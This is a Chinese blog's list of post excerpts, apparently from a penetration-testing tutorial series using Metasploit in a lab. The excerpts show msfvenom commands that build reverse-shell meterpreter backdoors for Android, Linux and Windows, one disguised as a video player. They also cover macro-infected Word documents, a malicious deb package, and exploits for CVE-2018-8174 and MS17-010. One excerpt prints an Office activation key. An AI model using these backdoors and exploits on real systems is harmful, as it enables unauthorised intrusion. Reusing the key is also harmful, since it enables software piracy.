2025年7月16日
安卓客户端渗透
摘要: 安卓客户端渗透同样的我们可以通过 MSF 生成一个 apk 的后门应用。 root@ kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.185.252 LPORT=4444 R > xuegod.apk 下载至安卓手机 阅读全文
posted @ 2025-07-16 15:11 长温不喜风云 阅读(45) 评论(0) 推荐(0)
利用 0DAY 漏洞 CVE-2018-8174 获取 shell
摘要: 利用 0DAY 漏洞 CVE-2018-8174 获取 shell1、安装 CVE-2018-8174_EXP 从 github 上克隆 CVE-2018-8174 的 EXP 到 Kali https://github.com/Yt1g3r/CVE-2018-8174_EXP2、生成恶意 html 阅读全文
posted @ 2025-07-16 15:11 长温不喜风云 阅读(44) 评论(0) 推荐(0)
利用宏感染 word 文档获取 shell
摘要: 利用宏感染 word 文档获取 shell首先将 cn_office_professional_plus_2007_dvd_X12-38713.rar 上传到 win7 虚拟上,解压后,安装一下 office。office 的激活码: DBXYD-TF477-46YM4-W74MH-6YDQ8roo 阅读全文
posted @ 2025-07-16 15:11 长温不喜风云 阅读(11) 评论(0) 推荐(0)
基于 java 环境的漏洞利用获取 shell
摘要: 基于 java 环境的漏洞利用获取 shell搭建 java 环境 第一步我们先安装 java 环境上传 jre 到 win7 或 xp 操作系统实战-使用 java 模块 getshell msf6 > use exploit/multi/browser/java_jre17_driver_man 阅读全文
posted @ 2025-07-16 15:11 长温不喜风云 阅读(16) 评论(0) 推荐(0)
制作恶意 deb 软件包来触发后门
摘要: 实战-制作恶意 deb 软件包来触发后门制作恶意软件包使用--download-only 方式下载软件包不进行安装 root@ kali:~# apt --download-only install freesweep 将软件包移动到 root 目录 root@ kali:~# mv /var/ca 阅读全文
posted @ 2025-07-16 15:11 长温不喜风云 阅读(24) 评论(0) 推荐(0)
制作 Linux 恶意软件获取 shell
摘要: 实战-制作 Linux 恶意软件获取 shell1、使用 msfvenom 生成 linux 可执行文件 root@kali:~# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168. 阅读全文
posted @ 2025-07-16 15:11 长温不喜风云 阅读(19) 评论(0) 推荐(0)
制作 Windows 恶意软件获取 shell
摘要: 制作 Windows 恶意软件获取 shell1.生成西瓜影音.exe 后门程序使用一个编码器 root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.185.2 阅读全文
posted @ 2025-07-16 15:02 长温不喜风云 阅读(27) 评论(0) 推荐(0)
使用 msf 渗透攻击 Win7 主机并远程执行命令
摘要: 实战-使用 msf 渗透攻击 Win7 主机并远程执行命令 通过 msf 模块获取 Win7 主机远程 shell 先扫描目标是否存在 ms17-010 漏洞 msf6 > search ms17-010 使用 use 命令选中这个模块 msf6 > use auxiliary/scanner/sm 阅读全文
posted @ 2025-07-16 14:57 长温不喜风云 阅读(56) 评论(0) 推荐(0)
基于 tcp 协议收集主机信息
摘要: 基于 tcp 协议收集主机信息1.使用 Metasploit 中的 nmap 和 arp_sweep 收集主机信息msf6 > db_nmap -sV 192.168.1.1 ARP 扫描 msf6 > use auxiliary/scanner/discovery/arp_sweep 查看一下模块 阅读全文
posted @ 2025-07-16 13:07 长温不喜风云 阅读(12) 评论(0) 推荐(0)
基于 SSH 协议收集信息
摘要: 基于 SSH 协议收集信息1.查看 ssh 服务的版本信息msf6 > use auxiliary/scanner/ssh/ssh_version msf6 auxiliary(scanner/ssh/ssh_version) > show options msf6 auxiliary(scanne 阅读全文
posted @ 2025-07-16 13:07 长温不喜风云 阅读(9) 评论(0) 推荐(0)